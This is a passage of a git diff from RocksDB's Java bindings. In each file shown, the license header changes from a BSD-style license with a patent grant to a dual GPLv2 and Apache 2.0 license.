index a920f4b4e27..11798eb59f2 100644
--- a/java/src/main/java/org/rocksdb/HistogramData.java
+++ b/java/src/main/java/org/rocksdb/HistogramData.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/HistogramType.java b/java/src/main/java/org/rocksdb/HistogramType.java
index bd001ed0253..2d95f5149f5 100644
--- a/java/src/main/java/org/rocksdb/HistogramType.java
+++ b/java/src/main/java/org/rocksdb/HistogramType.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/IndexType.java b/java/src/main/java/org/rocksdb/IndexType.java
index c1954e0995b..e0c113d39ac 100644
--- a/java/src/main/java/org/rocksdb/IndexType.java
+++ b/java/src/main/java/org/rocksdb/IndexType.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java b/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java
index 21aab069e03..7343691817b 100644
--- a/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java
+++ b/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java
@@ -1,8 +1,8 @@
 package org.rocksdb;
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 import java.util.List;

diff --git a/java/src/main/java/org/rocksdb/LRUCache.java b/java/src/main/java/org/rocksdb/LRUCache.java
index f4a509dce00..5e5bdeea277 100644
--- a/java/src/main/java/org/rocksdb/LRUCache.java
+++ b/java/src/main/java/org/rocksdb/LRUCache.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/Logger.java b/java/src/main/java/org/rocksdb/Logger.java
index 5db377dde15..90212592908 100644
--- a/java/src/main/java/org/rocksdb/Logger.java
+++ b/java/src/main/java/org/rocksdb/Logger.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/MemTableConfig.java b/java/src/main/java/org/rocksdb/MemTableConfig.java
index 8b854917f9e..83cee974a75 100644
--- a/java/src/main/java/org/rocksdb/MemTableConfig.java
+++ b/java/src/main/java/org/rocksdb/MemTableConfig.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 /**

diff --git a/java/src/main/java/org/rocksdb/MergeOperator.java b/java/src/main/java/org/rocksdb/MergeOperator.java
index 2cc1a1f3af2..296527f53f9 100644
--- a/java/src/main/java/org/rocksdb/MergeOperator.java
+++ b/java/src/main/java/org/rocksdb/MergeOperator.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com). All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java b/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java
index 959d5b79dfd..3585318dbda 100644
--- a/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java
+++ b/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java b/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java
index e6f30a718fc..c2efcc54b6b 100644
--- a/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java
+++ b/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/Options.java b/java/src/main/java/org/rocksdb/Options.java
index ad6b7ae37ad..dcd1138a8ab 100644
--- a/java/src/main/java/org/rocksdb/Options.java
+++ b/java/src/main/java/org/rocksdb/Options.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/PlainTableConfig.java b/java/src/main/java/org/rocksdb/PlainTableConfig.java
index 044c18d8032..c099981678b 100644
--- a/java/src/main/java/org/rocksdb/PlainTableConfig.java
+++ b/java/src/main/java/org/rocksdb/PlainTableConfig.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 /**

diff --git a/java/src/main/java/org/rocksdb/RateLimiter.java b/java/src/main/java/org/rocksdb/RateLimiter.java
index 6f4fef014df..fc2388777e9 100644
--- a/java/src/main/java/org/rocksdb/RateLimiter.java
+++ b/java/src/main/java/org/rocksdb/RateLimiter.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2015, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/ReadOptions.java b/java/src/main/java/org/rocksdb/ReadOptions.java
index ccdea296455..9d7b999561b 100644
--- a/java/src/main/java/org/rocksdb/ReadOptions.java
+++ b/java/src/main/java/org/rocksdb/ReadOptions.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/ReadTier.java b/java/src/main/java/org/rocksdb/ReadTier.java
index c6f48214d91..6dc76c52e58 100644
--- a/java/src/main/java/org/rocksdb/ReadTier.java
+++ b/java/src/main/java/org/rocksdb/ReadTier.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java b/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java
index 1beb45c46f0..6ee81d858c8 100644
--- a/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java
+++ b/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/RestoreOptions.java b/java/src/main/java/org/rocksdb/RestoreOptions.java
index 54b0eff28cb..94d93fc719c 100644
--- a/java/src/main/java/org/rocksdb/RestoreOptions.java
+++ b/java/src/main/java/org/rocksdb/RestoreOptions.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/RocksDB.java b/java/src/main/java/org/rocksdb/RocksDB.java
index 4a32f6a6a2f..eda0950990a 100644
--- a/java/src/main/java/org/rocksdb/RocksDB.java
+++ b/java/src/main/java/org/rocksdb/RocksDB.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/RocksDBException.java b/java/src/main/java/org/rocksdb/RocksDBException.java
index 25aadad8fa7..8b035f458f3 100644
--- a/java/src/main/java/org/rocksdb/RocksDBException.java
+++ b/java/src/main/java/org/rocksdb/RocksDBException.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/RocksEnv.java b/java/src/main/java/org/rocksdb/RocksEnv.java
index 72dc22c42c3..8fe61fd451f 100644
--- a/java/src/main/java/org/rocksdb/RocksEnv.java
+++ b/java/src/main/java/org/rocksdb/RocksEnv.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/RocksIterator.java b/java/src/main/java/org/rocksdb/RocksIterator.java
index 42e2460cf1d..9e9c6480928 100644
--- a/java/src/main/java/org/rocksdb/RocksIterator.java
+++ b/java/src/main/java/org/rocksdb/RocksIterator.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/RocksIteratorInterface.java b/java/src/main/java/org/rocksdb/RocksIteratorInterface.java
index 3ac74a90a2c..12fdbb19731 100644
--- a/java/src/main/java/org/rocksdb/RocksIteratorInterface.java
+++ b/java/src/main/java/org/rocksdb/RocksIteratorInterface.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/RocksMemEnv.java b/java/src/main/java/org/rocksdb/RocksMemEnv.java
index d7854eae178..d18d0ceb977 100644
--- a/java/src/main/java/org/rocksdb/RocksMemEnv.java
+++ b/java/src/main/java/org/rocksdb/RocksMemEnv.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/RocksMutableObject.java b/java/src/main/java/org/rocksdb/RocksMutableObject.java
index e167b27b1ac..e92289dc0c5 100644
--- a/java/src/main/java/org/rocksdb/RocksMutableObject.java
+++ b/java/src/main/java/org/rocksdb/RocksMutableObject.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2016, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/RocksObject.java b/java/src/main/java/org/rocksdb/RocksObject.java
index 2a35852c5e2..545dd896a06 100644
--- a/java/src/main/java/org/rocksdb/RocksObject.java
+++ b/java/src/main/java/org/rocksdb/RocksObject.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/Slice.java b/java/src/main/java/org/rocksdb/Slice.java
index a43af75ae8f..a122c3769d8 100644
--- a/java/src/main/java/org/rocksdb/Slice.java
+++ b/java/src/main/java/org/rocksdb/Slice.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/Snapshot.java b/java/src/main/java/org/rocksdb/Snapshot.java
index 8475ec9951d..a6b53f495f2 100644
--- a/java/src/main/java/org/rocksdb/Snapshot.java
+++ b/java/src/main/java/org/rocksdb/Snapshot.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/SstFileWriter.java b/java/src/main/java/org/rocksdb/SstFileWriter.java
index aef8ca2dfe3..8fe576082e8 100644
--- a/java/src/main/java/org/rocksdb/SstFileWriter.java
+++ b/java/src/main/java/org/rocksdb/SstFileWriter.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/Statistics.java b/java/src/main/java/org/rocksdb/Statistics.java
index 96e9b5d239d..10c072c897e 100644
--- a/java/src/main/java/org/rocksdb/Statistics.java
+++ b/java/src/main/java/org/rocksdb/Statistics.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/StatisticsCollector.java b/java/src/main/java/org/rocksdb/StatisticsCollector.java
index 8ebcb4dbc0a..48cf8af88e6 100644
--- a/java/src/main/java/org/rocksdb/StatisticsCollector.java
+++ b/java/src/main/java/org/rocksdb/StatisticsCollector.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java b/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java
index 18f81790e5b..f3785b15f6c 100644
--- a/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java
+++ b/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/StatsCollectorInput.java b/java/src/main/java/org/rocksdb/StatsCollectorInput.java
index a3acede3fc6..5bf43ade5a6 100644
--- a/java/src/main/java/org/rocksdb/StatsCollectorInput.java
+++ b/java/src/main/java/org/rocksdb/StatsCollectorInput.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/StatsLevel.java b/java/src/main/java/org/rocksdb/StatsLevel.java
index 023d4e1a232..cc2a87c6a21 100644
--- a/java/src/main/java/org/rocksdb/StatsLevel.java
+++ b/java/src/main/java/org/rocksdb/StatsLevel.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/Status.java b/java/src/main/java/org/rocksdb/Status.java
index b9ec348d6e0..d34b72c6913 100644
--- a/java/src/main/java/org/rocksdb/Status.java
+++ b/java/src/main/java/org/rocksdb/Status.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/StringAppendOperator.java b/java/src/main/java/org/rocksdb/StringAppendOperator.java
index b392ef677d6..85c36adc7c1 100644
--- a/java/src/main/java/org/rocksdb/StringAppendOperator.java
+++ b/java/src/main/java/org/rocksdb/StringAppendOperator.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com). All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/TableFormatConfig.java b/java/src/main/java/org/rocksdb/TableFormatConfig.java
index 29cd262c2c3..dbe524c4226 100644
--- a/java/src/main/java/org/rocksdb/TableFormatConfig.java
+++ b/java/src/main/java/org/rocksdb/TableFormatConfig.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 /**

diff --git a/java/src/main/java/org/rocksdb/TickerType.java b/java/src/main/java/org/rocksdb/TickerType.java
index 69b50399bb0..948079c75a9 100644
--- a/java/src/main/java/org/rocksdb/TickerType.java
+++ b/java/src/main/java/org/rocksdb/TickerType.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/TtlDB.java b/java/src/main/java/org/rocksdb/TtlDB.java
index 72704893c29..740f51268ef 100644
--- a/java/src/main/java/org/rocksdb/TtlDB.java
+++ b/java/src/main/java/org/rocksdb/TtlDB.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/WALRecoveryMode.java b/java/src/main/java/org/rocksdb/WALRecoveryMode.java
index c5470da9c70..d3fc47b631f 100644
--- a/java/src/main/java/org/rocksdb/WALRecoveryMode.java
+++ b/java/src/main/java/org/rocksdb/WALRecoveryMode.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/WBWIRocksIterator.java b/java/src/main/java/org/rocksdb/WBWIRocksIterator.java
index 4222e1a2606..d45da2b3a1f 100644
--- a/java/src/main/java/org/rocksdb/WBWIRocksIterator.java
+++ b/java/src/main/java/org/rocksdb/WBWIRocksIterator.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/WriteBatch.java b/java/src/main/java/org/rocksdb/WriteBatch.java
index fb447c92c6b..272e9b4cdf0 100644
--- a/java/src/main/java/org/rocksdb/WriteBatch.java
+++ b/java/src/main/java/org/rocksdb/WriteBatch.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/WriteBatchInterface.java b/java/src/main/java/org/rocksdb/WriteBatchInterface.java
index 4746ba3a1e4..cd024ad58d4 100644
--- a/java/src/main/java/org/rocksdb/WriteBatchInterface.java
+++ b/java/src/main/java/org/rocksdb/WriteBatchInterface.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java b/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java
index 0b55543c157..fdf89b2798c 100644
--- a/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java
+++ b/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/WriteOptions.java b/java/src/main/java/org/rocksdb/WriteOptions.java
index 6055d1761a7..b9e8ad81c23 100644
--- a/java/src/main/java/org/rocksdb/WriteOptions.java
+++ b/java/src/main/java/org/rocksdb/WriteOptions.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
